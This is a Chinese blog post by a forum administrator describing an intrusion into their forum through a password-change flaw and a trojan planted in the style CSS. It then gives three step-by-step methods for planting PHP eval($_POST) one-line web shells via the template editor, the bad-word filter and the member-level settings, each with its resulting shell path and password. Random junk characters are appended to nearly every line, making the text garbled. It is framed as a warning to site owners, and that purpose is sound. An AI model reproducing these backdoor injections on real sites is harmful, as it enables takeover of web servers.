黑客你是如此猖狂

郁闷，刚居然没提交成功，写那么多都白写了。.. mIw<ak9

哎... ,f$_53 ;!

今天下午5点多论坛出现问题，国内几个大站也相继被挂马,从QQ上站长找我的时间来看几乎是一个时间段爆发的.也就是说工具估计是在下午5:20左右公布出来的 2VWd(!l

因为当时因为急着有事,我没做什么处理就是关闭了下论坛,把相关几个敏感的地方做了修改.. imR B_ut

呵呵，其实这次漏洞的利用出在require文件夹中的一个文件过滤不严格造成的，可以任意修改别人的密码 .. lGd[<14LO

漏洞最先由国外某安全组织发布出来.接着由NEAOO发布到自己的BLOG上,于是下午5点多大规模爆发. 7hGe[!&l

简单的分析下华北此次被入侵过程. sU at{j1

17:26分黑客使用利用工具修改了我的管理员密码,此时的IP为221.226.90.135,修改后没有立即进行修改,而是做了一个比较聪明的举动，呵呵,估计知道华北的前身吧,他居然在前台上传附件,然后在附件中放如他的木马,呵呵，比较聪明的一招..可最后删除了这个帖子,进入后台修改了风格中的CSS文件,挂了他的木马.挂的木马是最新的那个过全系统的网马,危害很大.. lnm(vC%

从入侵过程来看，持续了5分钟左右，从手段以及速度分析此人不过是个小辈而已(呵呵，就是说你小辈,怎么了?不服气,有本事在来啊，呵呵，欢迎你继续.)  GSi=V

今天要不是因为个人问题,我们估计就有的完了，呵呵 seXv9ED*

以下是黑客进入后台中可能挂马以及六后门的地方，请大家注意 8%*|V g

 r'{ <p

方式1 模板法 k45:B(F

< g{%(*[

进入后台， 风格模版设置 ，在随便一行写代码  (4 b8

记住，这代码必须顶着左边行写，代码前面不可以有任何字符。  &rGiyP(L

EOT; ;Qrs#vSG

eval($a); bhLz)cEXr

print << H(Bss~u

s_a J|bU

例如，我写完某一行为。 T+CS1 L5J

.headurl { color:#ffffff;} !: yW`n'A

EOT; 7! DR31c4

eval($_POST[’a’]); il#XV
Y>MM

print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;} 2`"8 =j

AWV"S@[;

而后得到一个shell jHCB$ZQb

http://localhost/bbs/index.php >"b0!e

（由于写到css里，也许有的操作无法返回，但是只要没有什么问题，一般操作都是可以接受的） Y!`B,QLR

密码是a lanker的一句话后门。 lh)O/=@d

E9@Z{<C1F

方式2 脏话过滤法 pWJrf%

7,<cS8+

进入安全管理 ◇ 不良词语过滤 |dt cb

.5y ;a/ZG

新增 V_lrIB*&

不良词语写 a’]=’aa’;eval($_POST[’a’]);// Q)9KQs

替换为那里可以随意写 hY q;P{mh

lsx x@W1

而后得到一个shell地址为 pi}/xz`C

http://localhost/bbs/data/bbscache/wordsfb.php R UffDa

W99vV0lqh

密码是a lanker的一句话后门。 #qW{ :

Q6zo1

方式3 用户等级管理 #1Ye#D/ug

然后新建立会员组 7&e1$NJ

头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a’;eval($_POST[’a’]);// A($xXm

升级点数依然可以随意写。 s?K7o4:#

|J7kPFl

而后得到一个shell地址为 <V#G\Gqva

http://localhost/bbs/data/bbscache/level.php U{<7u\M-

密码是a lanker的一句话后门。 e[ aA"T 

>s/~fm+Y

这里提供的方式随便你选一种都可以得到shell。。。 (Q8*#.`i

方式三请按说明仔细操作，否则会导致论坛无法正常运行，后果，自负 Pq{~jW?

附件中给出利用工具以及修补办法,请各位站长及时修补并检查后门 )i>-~

补丁使用说明: 解压缩补丁包后将里面的upload目录覆盖论坛目录即可! Sa8[ k1V[E

最后:强烈鄙视下今天下午挂马的那位朋友的技术.太菜.呵呵..

• ·谷歌输入法真的存心陷害搜狗吗?
• ·地方分类信息引领web2.0
• ·Google(谷歌)正式发布网站优化器
• ·抢先去设计属于自己的Google地图
• ·眼镜蛇就“跑跑卡丁车”通用网址一案提起诉讼
• ·从Cnet的衰落与Enet被购的谣言谈IT网站
• ·google的输入法即使推成功了又能怎么样？
• ·互联网并非无所不能
• ·李一鑫：搜索排名的红与黑
• ·谷歌发布网站优化器 面向全球的AdWords广